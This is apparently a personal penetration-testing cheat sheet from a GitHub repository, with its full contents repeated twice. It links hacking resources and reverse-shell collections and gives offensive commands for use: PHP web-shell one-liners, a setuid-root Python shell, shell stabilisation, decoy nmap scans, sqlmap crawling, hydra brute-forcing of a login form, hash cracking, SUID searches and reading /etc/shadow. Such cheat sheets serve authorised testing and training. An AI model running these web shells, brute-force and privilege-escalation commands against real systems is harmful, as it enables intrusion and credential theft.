cryptrz/Pentest-Cheat-Sheet.yml

## Pentest-Cheat-Sheet.yml
#########################################################
https://start.me/p/vjEPvb/thug-bounty # Pentest / Bug bounty bookmarks
https://start.me/p/QRQb0O/trouble-fake # OSINT bookmarks
#########################################################
https://github.com/Hack-with-Github/Awesome-Hacking
https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md
https://github.com/shieldfy/API-Security-Checklist/blob/master/README.md
https://www.jhaddix.com/post/my-xmind-hunt-template-for-hakluke
https://github.com/Ignitetechnologies/Mindmap
#########################################################
https://gtfobins.github.io
https://cheat.sh/
https://github.com/Orange-Cyberdefense/arsenal
https://github.com/danielmiessler/SecLists
https://github.com/kkrypt0nn/wordlists
https://github.com/fuzzdb-project/fuzzdb
https://cheatsheetseries.owasp.org/Glossary.html
https://github.com/The-Z-Labs/linux-exploit-suggester
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://github.com/terjanq/Tiny-XSS-Payloads
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php
https://github.com/carlospolop/PEASS-ng/releases
https://github.com/gnebbia/hydra_notes
https://gist.github.com/sente/4dbb2b7bdda2647ba80b
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt
https://github.com/internetwache/GitTools
https://github.com/Ebryx/GitDump
https://wordlists.assetnote.io/
http://web-sniffer.net/
https://scoop.sh/
#########################################################
https://docs.adyen.com/development-resources/testing/test-card-numbers/
#########################################################
*********************INSTALL PIP2***********************
sudo apt install python2.7
cd /opt  && sudo curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python2 get-pip.py
#########################################################

Cookie Injector:
https://gist.githubusercontent.com/cryptrz/a142f145d250450f408f19a52e0743b1/raw/e046cfb7cf9a4c8b50174651fef1e79e89faeda7/Cookie%2520Injector%2520(mod%2520FF%2520+%2520Chrome)

#########################################################

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm

python3 -c 'import os; execl("/bin/sh"; "sh", "-p")'

/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'

sudo openvpn --data-ciphers AES-256-CBC --config <file>

nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F <TARGET>

nmap -sS -Pn -D RND,10.10.55.33,ME,RND -F <TARGET>

nmap -sV --script=vulscan/vulscan.nse <URL>

nmap -p 53 --script dns-brute <URL>

ffuf -w /path/to/wordlist -t 25 -c -ac -mc 200,204,301,302, 307,400, 401,405 -u https://url.com/FFUF

find / -perm -u=s -type f 2>/dev/null

find / -perm -u=s -type f -name <word> 2>/dev/null

sqlmap -u https://target.com/ --dbs --random-agent --forms --crawl=2

john file --wordlist=list.txt --format=Raw-MD5

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/path/login.php:username=admin&password=^PASS^:Invalid Password!"

<?php system($_GET['cmd']);?>

<?php echo system($_GET['cmd']); ?>

<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

To temporarly switch to a bash shell:
exec bash --login

Stabilize a shell on meterpreter:
script /dev/null -c bash
CTRL + Z (nc process into the background)
stty raw -echo; fg
reset
xterm
export TERM=xterm
export SHELL=bash

###########################################################
********************LINUX ENUMERATION**********************
###########################################################
uname -a
cat/proc/version
cat /etc/*-release
cat /proc/cpuinfo
df -a
df -h
cat /etc/shells
whoami
pwd
id
users
cat /etc/passwd
sudo cat /etc/shadow
pinky
w
who -a
last
lastlog
ps
ps -e | more
ps aux | more
top
dpkg -l
route
sudo iptables -L

###########################################################
*******************WINDOWS ENUMERATION*********************
###########################################################

PSTools: https://learn.microsoft.com/en-us/sysinternals/downloads/pstools
Shareenum: https://github.com/CroweCybersecurity/shareenum

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

###########################################################
**********************HTML TEMPLATE************************
###########################################################

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <script type="text/javascript">

    </script>
  </body>
</html>
###########################################################
###########################################################
	#########################################################
	https://start.me/p/vjEPvb/thug-bounty # Pentest / Bug bounty bookmarks
	https://start.me/p/QRQb0O/trouble-fake # OSINT bookmarks
	#########################################################
	https://github.com/Hack-with-Github/Awesome-Hacking
	https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md
	https://github.com/shieldfy/API-Security-Checklist/blob/master/README.md
	https://www.jhaddix.com/post/my-xmind-hunt-template-for-hakluke
	https://github.com/Ignitetechnologies/Mindmap
	#########################################################
	https://gtfobins.github.io
	https://cheat.sh/
	https://github.com/Orange-Cyberdefense/arsenal
	https://github.com/danielmiessler/SecLists
	https://github.com/kkrypt0nn/wordlists
	https://github.com/fuzzdb-project/fuzzdb
	https://cheatsheetseries.owasp.org/Glossary.html
	https://github.com/The-Z-Labs/linux-exploit-suggester
	https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
	https://github.com/terjanq/Tiny-XSS-Payloads
	https://portswigger.net/web-security/sql-injection/cheat-sheet
	https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
	https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php
	https://github.com/carlospolop/PEASS-ng/releases
	https://github.com/gnebbia/hydra_notes
	https://gist.github.com/sente/4dbb2b7bdda2647ba80b
	https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt
	https://github.com/internetwache/GitTools
	https://github.com/Ebryx/GitDump
	https://wordlists.assetnote.io/
	http://web-sniffer.net/
	https://scoop.sh/
	#########################################################
	https://docs.adyen.com/development-resources/testing/test-card-numbers/
	#########################################################
	*******************INSTALL PIP2*********************
	sudo apt install python2.7
	cd /opt && sudo curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
	sudo python2 get-pip.py
	#########################################################

	Cookie Injector:
	https://gist.githubusercontent.com/cryptrz/a142f145d250450f408f19a52e0743b1/raw/e046cfb7cf9a4c8b50174651fef1e79e89faeda7/Cookie%2520Injector%2520(mod%2520FF%2520+%2520Chrome)

	#########################################################

	python3 -c "import pty;pty.spawn('/bin/bash')"
	export TERM=xterm

	python3 -c 'import os; execl("/bin/sh"; "sh", "-p")'

	/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'

	sudo openvpn --data-ciphers AES-256-CBC --config <file>

	nmap -sS -Pn -D 10.10.10.1,10.10.10.2,ME -F <TARGET>

	nmap -sS -Pn -D RND,10.10.55.33,ME,RND -F <TARGET>

	nmap -sV --script=vulscan/vulscan.nse <URL>

	nmap -p 53 --script dns-brute <URL>

	ffuf -w /path/to/wordlist -t 25 -c -ac -mc 200,204,301,302, 307,400, 401,405 -u https://url.com/FFUF

	find / -perm -u=s -type f 2>/dev/null

	find / -perm -u=s -type f -name <word> 2>/dev/null

	sqlmap -u https://target.com/ --dbs --random-agent --forms --crawl=2

	john file --wordlist=list.txt --format=Raw-MD5

	hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/path/login.php:username=admin&password=^PASS^:Invalid Password!"

	<?php system($_GET['cmd']);?>

	<?php echo system($_GET['cmd']); ?>

	<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

	To temporarly switch to a bash shell:
	exec bash --login

	Stabilize a shell on meterpreter:
	script /dev/null -c bash
	CTRL + Z (nc process into the background)
	stty raw -echo; fg
	reset
	xterm
	export TERM=xterm
	export SHELL=bash

	###########################################################
	******************LINUX ENUMERATION********************
	###########################################################
	uname -a
	cat/proc/version
	cat /etc/*-release
	cat /proc/cpuinfo
	df -a
	df -h
	cat /etc/shells
	whoami
	pwd
	id
	users
	cat /etc/passwd
	sudo cat /etc/shadow
	pinky
	w
	who -a
	last
	lastlog
	ps
	ps -e \| more
	ps aux \| more
	top
	dpkg -l
	route
	sudo iptables -L

	###########################################################
	*****************WINDOWS ENUMERATION*******************
	###########################################################

	PSTools: https://learn.microsoft.com/en-us/sysinternals/downloads/pstools
	Shareenum: https://github.com/CroweCybersecurity/shareenum

	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	###########################################################
	********************HTML TEMPLATE**********************
	###########################################################

	<!DOCTYPE html>
	<html lang="en" dir="ltr">
	<head>
	<meta charset="utf-8">
	<title></title>
	</head>
	<body>
	<script type="text/javascript">

	</script>
	</body>
	</html>
	###########################################################
	###########################################################